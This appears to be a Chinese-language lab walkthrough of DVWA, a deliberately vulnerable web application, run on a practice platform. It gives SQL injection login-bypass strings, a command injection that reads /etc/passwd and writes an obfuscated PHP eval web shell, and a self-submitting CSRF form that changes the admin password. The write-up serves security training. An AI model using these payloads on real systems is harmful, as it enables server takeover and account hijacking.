DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
谜团靶机平台地址:https://mituan.zone/
注册选择靶机
注册登录之后可以看到有很多靶机,选择本次的目标-DVWA。

点击开始练习

点击打开按钮

在新打开的页面中输入admin password登录,进行靶场初始化。

初始化完成之后,重新登录,开始靶场练习。。。
Brute Force
输入admin、admin之后抓包,发送到爆破模块,添加字典然后进行暴力破解,成功得到密码password。

经过查看源码,发现也可以通过注入的方式登录,
admin' and 1=1 -- qweor不行admin' or '1'='1and不行admin'#

Command Injection
输入127.0.0.1 | cat /etc/passwd或者| echo '<?php $a="6576616c28245f52455"."1554553545b385d293b";$b="a";define("a",PACK("H*",$$b));eval(a);?>' > ../../mituan.php,之后访问地址http://b20b47d25e6e4146a001ba46fd059ea4.app.mituan.zone/mituan.php?8=phpinfo();

CSRF
点击Change之后,用Burp抓包,然后制作CSRF Poc。
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form id='a' action="http://b20b47d25e6e4146a001ba46fd059ea4.app.mituan.zone/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="admin123" />
<input type="hidden" name="password_conf" value="admin123" />
<input type="hidden" name="Change" value="Change" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
function abc(){
document.getElementById('a').submit();
}
setTimeout(abc, 500);
</script>
</html>

本文详细介绍了DVWA漏洞挑战,包括BruteForce暴力破解、CommandInjection命令注入、CSRF跨站请求伪造、FileInclusion文件包含、FileUpload文件上传、InsecureCAPTCHA验证码、SQLInjection注入攻击、弱SessionID管理及XSS跨站脚本等。通过实战演练,学习者可提升安全意识和防护技巧。
最低0.47元/天 解锁文章
616

被折叠的 条评论
为什么被折叠?



